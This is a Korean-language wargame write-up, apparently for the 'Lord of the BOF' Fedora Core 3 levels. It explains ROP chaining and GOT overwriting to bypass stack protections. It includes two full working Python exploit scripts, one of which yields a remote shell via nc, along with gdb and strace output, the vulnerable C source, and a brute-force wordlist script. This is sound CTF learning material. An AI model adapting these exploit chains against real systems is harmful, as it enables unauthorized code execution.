[ROP] 문서 내용 중..

custom stack 의 위치를 정하기 위해 주의해야 할 사항:

· 주소안에서 NULL 값을 피하기위해 우리는 마지막 byte 값을 낮은 값으로 선택해줘야 한다. (예:

0x8049810)

· GOT 테이블이 예상치 못하게 덮어지는 상황을 주의해야 한다.

· 스택은 높은주소에서부터 낮은 주소로 자라기 때문에, data 영역을 시작 주소로 잡아서는 안된다.

(예: 시작주소를 0x8049010 으로 잡아버리면 ret-to-libc call 이 실패할 것이다.)

· 보통은 ".data" 혹은 "bss" 영역 이후의 주소로 잡아주는것이 custom stack 을 설정하기에 좋다.

[ 이전 공격구문 ]

[buffer = 264 ] [ SFP = 4 ] [ RET = 4 ]

                         EBP초기화   [ 공격구문 ] 

[ 공격구문 ]

[ strcpy@plt ] , [ PPR ] , [ memcpy@GOT+0 ] , [ execve 첫번째 바이트를 가진 주소 값 ]

[ strcpy@plt ] , [ PPR ] , [ memcpy@GOT+1 ] , [ execve 두번째 바이트를 가진 주소 값 ]

[ strcpy@plt ] , [ PPR ] , [ memcpy@GOT+2 ] , [ execve 세번째 바이트를 가진 주소 값 ]

[ strcpy@plt ] , [ PPR ] , [ memcpy@GOT+3 ] , [ execve 네번째 바이트를 가진 주소 값 ]

[main+240(memcpy 를 하고 난 다음 다시 복귀 할 EBP 주소 ],

[고정된 주소 아무곳이나.. 심볼릭 링크를 걸 것임 == /bin/sh 가 안됐음 ]

[ 이번에 적용한 공격구문 ]

[buffer = 264 ] [ SFP = 4 ] [ RET = 4 ]

                         EBP초기화   [ 공격구문 ] 

[ 공격구문 ]

[ strcpy@plt ] , [ PPR ] , [ CUSTOM_ADDR + 0 ] , [ system 첫번째 바이트를 가진 주소 값 ]

[ strcpy@plt ] , [ PPR ] , [ CUSTOM_ADDR + 1 ] , [ system 두번째 바이트를 가진 주소 값 ]

[ strcpy@plt ] , [ PPR ] , [ CUSTOM_ADDR + 2 ] , [ system 세번째 바이트를 가진 주소 값 ]

[ strcpy@plt ] , [ PPR ] , [ CUSTOM_ADDR + 3 ] , [ system 네번째 바이트를 가진 주소 값 ]

[ strcpy@plt ] , [ PPR ] , [ memcpy@GOT ] , [ CUSTOM_ADDR 주소 값 ]

[main+240(memcpy 를 하고 난 다음 다시 복귀 할 EBP 주소 ],

[ &/bin/sh ]

memcpy@plt :  0x08048418

(gdb) x/5i 0x08048418

0x8048418 <_init+120>: jmp    *0x8049850

memcpy@got : 0x08049850

strcpy@plt  : 0x08048438

PPR : 0x080484f0  

"/bin/sh" @ addr = 0x833604

system : 0x7507c0

c0 : 0x80484d0

07 : 0x8048ca9

75 : 0x80486ee

00 : 0x804875e

임의의 스택값 : 0x80498a0: 0x00000000 0x00000000 0x00000000 0x00000000

//이경우 memcpy@got 에 직접 씌워주려 했으나, 실패했다. GOT table이 깨지는 듯 하여 임의의 주소값에 system 주소를담고 다시 이를 memcpy 로 가져옴으로써 정확한 주소값만 Overwrite를 할 수 있도록 하였다.

1. 번외 : [/bin/sh] 주소값 찾기

system 함수 내에는 do_system 이란 함수가 존재하고 이는 /bin/sh 를 인자값으로 쓴다.

때문에 system 함수를 기점으로 문자열을 검색해보면 [/bin/sh] 의 주소값을 찾을 수 있다.

[evil_wizard@Fedora_1stFloor ~]$ cat findsh.c

#include<stdio.h>

int main(int argc, char *argv[]){

int addr=0x007507c5; //system 함수의 주소

while(1){

if(memcmp(addr++,"/bin/sh",8)==0){

printf("[%p]\n",addr);

break;

}

}

return 0;

}

[ source code ]

import os

MEMCPY_GOT = "\x50\x98\x04\x08"

BINSH = "\x03\x36\x83\x00"

CALL_MEMCPY = "\x95\x85\x04\x08"

#SYSTEM = "\xc0\x07\x75\x00"

ADDR_C0 = "\xd0\x84\x04\x08"

ADDR_07 = "\xa9\x8c\x04\x08"

ADDR_75 = "\xee\x86\x04\x08"

ADDR_00 = "\x5e\x87\x04\x08"

STRCPY =  "\x38\x84\x04\x08" 

PPR =  "\xf3\x84\x04\x08"

CUSTOM_0 =  "\xa0\x98\x04\x08"

CUSTOM_1 =  "\xa1\x98\x04\x08"

CUSTOM_2 =  "\xa2\x98\x04\x08"

CUSTOM_3 =  "\xa3\x98\x04\x08"

def main():

BUFFER = "\x90"*268

ATTACK = BUFFER + \

STRCPY + PPR + CUSTOM_0 + ADDR_C0+\

 STRCPY + PPR + CUSTOM_1 + ADDR_07+\

 STRCPY + PPR + CUSTOM_2 + ADDR_75+\

 STRCPY + PPR + CUSTOM_3 + ADDR_00+\

 STRCPY + PPR + MEMCPY_GOT + CUSTOM_0+\

 CALL_MEMCPY + BINSH

print ATTACK

if __name__ ==  '__main__':

main()

[evil_wizard@Fedora_1stFloor ~]$ (python exploit6.py ;cat)| nc localhost 8888

dark_stone : how fresh meat you are!

you : id           

uid=505(dark_stone) gid=505(dark_stone) context=user_u:system_r:unconfined_t

my-pass

euid = 505

let there be light

[dark_stone@Fedora_1stFloor ~]$ ls -al

total 56

drwx--x---  2 dark_stone dark_stone 4096 Apr 28  2010 .

drwxr-xr-x  8 root       root       4096 Apr 28  2010 ..

-rw-r--r--  1 dark_stone dark_stone   24 Apr 28  2010 .bash_logout

-rw-r--r--  1 dark_stone dark_stone  191 Apr 28  2010 .bash_profile

-rw-r--r--  1 dark_stone dark_stone  124 Apr 28  2010 .bashrc

-rw-r--r--  1 root       root        580 Apr 28  2010 dropped_item.txt

-rw-r--r--  1 dark_stone dark_stone  383 Apr 28  2010 .emacs

[dark_stone@Fedora_1stFloor ~]$ cat dropped_item.txt 

                   ,.

                 ,'  `.

               ,' _<>_ `.

             ,'.-'____`-.`.

           ,'_.-''    ``-._`.

         ,','      /\      `.`.

       ,' /.._  O /  \ O  _.,\ `.

     ,'/ /  \ ``-;.--.:-'' /  \ \`.

   ,' : :    \  /\`.,'/\  /    : : `.

  < <>| |   O >(< (  ) >)< O   | |<> >

   `. : :    /  \/,'`.\/  \    ; ; ,'

     `.\ \  /_..-:`--';-.._\  / /,'

       `. \`'   O \  / O   `'/ ,'

         `.`._     \/     _,','

           `..``-.____.-'',,'

             `.`-.____.-','

               `.  <>  ,'

                 `.  ,' 

[hell_fire@Fedora_1stFloor ~]$ cat evil_wizard.c

/*

The Lord of the BOF : The Fellowship of the BOF 

- evil_wizard

- Local BOF on Fedora Core 3   

- hint : GOT overwriting    //GOT overwrite 를 하라는 힌트가 있음

*/

// magic potion for you

void pop_pop_ret(void) //좀있다 사용될 PPR 코드를 만들어 둬서 찾기 쉽게 만들어줌. 

{

asm("pop %eax");

asm("pop %eax");

asm("ret");

}

int main(int argc, char *argv[])

{

char buffer[256];

char saved_sfp[4];

int length; 

if(argc < 2){

printf("argv error\n");

exit(0);

}

// for disturbance RET sleding

length = strlen(argv[1]);

        // healing potion for you

        setreuid(geteuid(), geteuid());

        setregid(getegid(), getegid());

// save sfp 

memcpy(saved_sfp, buffer+264, 4);   // EBP 를 저장시킴

// overflow!!

strcpy(buffer, argv[1]);   //OVER FLOW 발생지점 

// restore sfp 

memcpy(buffer+264, saved_sfp, 4); //EBP를 복원시켜서 오버플로우로 EBP바뀐것이 소용없도록함

        // disturbance RET sleding

        memset(buffer+length, 0, (int)0xff000000 - (int)(buffer+length)); 

printf("%s\n", buffer);

}

필요한 함수들의 주소

(gdb)p execve

{<text variable, no debug info>} 0x7a5490 <execve>

(gdb) info func

0x0804854c  pop_pop_ret

[hell_fire@Fedora_1stFloor ~]$ objdump -d ./evil_wizard | grep strcpy

08048494 <strcpy@plt>:

 8048624: e8 6b fe ff ff       call   8048494 <strcpy@plt>

(gdb) x/10xi 0x8048434

0x8048434 <_init+104>: jmp    *0x8049888

0x804843a <_init+110>: push   $0x20

(gdb) x/10xi 0x8049888   //memcpy GOT 주소값 

0x8049888 <_GLOBAL_OFFSET_TABLE_+28>: rclb   $0x60,0x0(%eax,%edi,2)

0x804988d <_GLOBAL_OFFSET_TABLE_+33>: cwtl   

(gdb) x/10xi *0x8049888  //memcpy GOT 주소값의 값들을 확인해보면 memcpy가 들어있음

0x7854c0 <memcpy>: mov    0xc(%esp),%ecx

0x7854c4 <memcpy+4>: mov    %edi,%eax

0x7854c6 <memcpy+6>: mov    0x4(%esp),%edi

[ 정리 ]

 PPR  address : 0x0804854c

 strcpy@PLT    : 0x8048494

 memcpy@GOT : 0x8049888

 execve          : 0x007a5490

                              0x90  : 0x8049450

0x54  : 0x80487b4

0x7a  : 0x8048898

0x00  : 0x8048798

main+240         : 0x08048644

- main+240 주소값 구하기 

- execve 주소값을 가지고 있는 주소값 구하기 (고정된 주소는 다 뒤져야함)

import os

def main():

        x= "x"*268+\

                "\x94\x84\x04\x08"+"\x4f\x85\x04\x08"+"\x88\x98\x04\x08"+"\x50\x94\x04\x08"+\

                "\x94\x84\x04\x08"+"\x4f\x85\x04\x08"+"\x89\x98\x04\x08"+"\xb4\x87\x04\x08"+\

                "\x94\x84\x04\x08"+"\x4f\x85\x04\x08"+"\x8a\x98\x04\x08"+"\x98\x88\x04\x08"+\

                "\x94\x84\x04\x08"+"\x4f\x85\x04\x08"+"\x8b\x98\x04\x08"+"\x98\x87\x04\x08"+\

                "\x44\x86\x04\x08"+"\xc6\x84\x04\x08"

                 #strcpy@Plt  + PPR_addr + memcpy@GOT_addr+0 + execve_1st_addr <- addr

                 #strcpy@Plt  + PPR_addr + memcpy@GOT_addr+1 + execve_2st_addr <- addr

                 #strcpy@Plt  + PPR_addr + memcpy@GOT_addr+2 + execve_3st_addr <- addr

                 #strcpy@Plt  + PPR_addr + memcpy@GOT_addr+3 + execve_4st_addr <- addr

                 #main+240 (EBP)  + somewhere static address

        TARGET = "./evil_wizard"

        CMD = TARGET + " " + x

        os.system(CMD)

if __name__ == '__main__' :

        main()

[hell_fire@Fedora_1stFloor ~]$ strace -i ./evil_wizard `python -c 'print "x"*268+"\x94\x84\x04\x08"+"\x4f\x85\x04\x08"+"\x88\x98\x04\x08"+"\x50\x94\x04\x08"+"\x94\x84\x04\x08"+"\x4f\x85\x04\x08"+"\x89\x98\x04\x08"+"\xb4\x87\x04\x08"+"\x94\x84\x04\x08"+"\x4f\x85\x04\x08"+"\x8a\x98\x04\x08"+"\x98\x88\x04\x08"+"\x94\x84\x04\x08"+"\x4f\x85\x04\x08"+"\x8b\x98\x04\x08"+"\x98\x87\x04\x08"+"\x44\x86\x04\x08"+"\xc6\x84\x04\x08"'`//고정된 주소 값 

.

.

.[007037a2] execve("??U???, [0], [/* 0 vars */]) = -1 ENOENT (No such file or directory) //특정값을 실행

[00784fd7] --- SIGSEGV (Segmentation fault) @ 0 (0) ---

upeek: ptrace(PTRACE_PEEKUSER,4524,48,0): No such process

[????????] +++ killed by SIGSEGV +++

[hell_fire@Fedora_1stFloor ~]$ 

[hell_fire@Fedora_1stFloor ~]$ strace -i ./evil_wizard `python -c 'print "x"*268+"\x94\x84\x04\x08"+"\x4f\x85\x04\x08"+"\x88\x98\x04\x08"+"\x50\x94\x04\x08"+"\x94\x84\x04\x08"+"\x4f\x85\x04\x08"+"\x89\x98\x04\x08"+"\xb4\x87\x04\x08"+"\x94\x84\x04\x08"+"\x4f\x85\x04\x08"+"\x8a\x98\x04\x08"+"\x98\x88\x04\x08"+"\x94\x84\x04\x08"+"\x4f\x85\x04\x08"+"\x8b\x98\x04\x08"+"\x98\x87\x04\x08"+"\x44\x86\x04\x08"+"\xc6\x84\x04\x08"'` 2> error.txt //고정된 주소 값

[hell_fire@Fedora_1stFloor ~]$xxd error.txt

0000970: 3761 325d 2065 7865 6376 6528 2290 9055  7a2] execve("..U

0000980: 89e5 53e8 222c 205b 305d 2c20 5b2f 2a20  ..S.", [0], [/* 

위에 검은색 부분을 실행시킴 

import time

your_list1 = 'abcdefghijklmnopqrstuvwxyz'

your_list2 = '1234567890'

your_list3 = 'abcdefghijklmnopqrstuvwxyz1234567890'

TheKey = ''

current =''

def bruteForcing(y):

        for current in xrange(7):

                TheKey = [i for i in your_list1]

                for y in xrange(current):

                        TheKey = [x+i for i in your_list1 for x in TheKey]

                for i in range(0,len(TheKey)) :

                        print TheKey[i]

def main():

        bruteForcing(0)

if __name__ == '__main__' :

        main()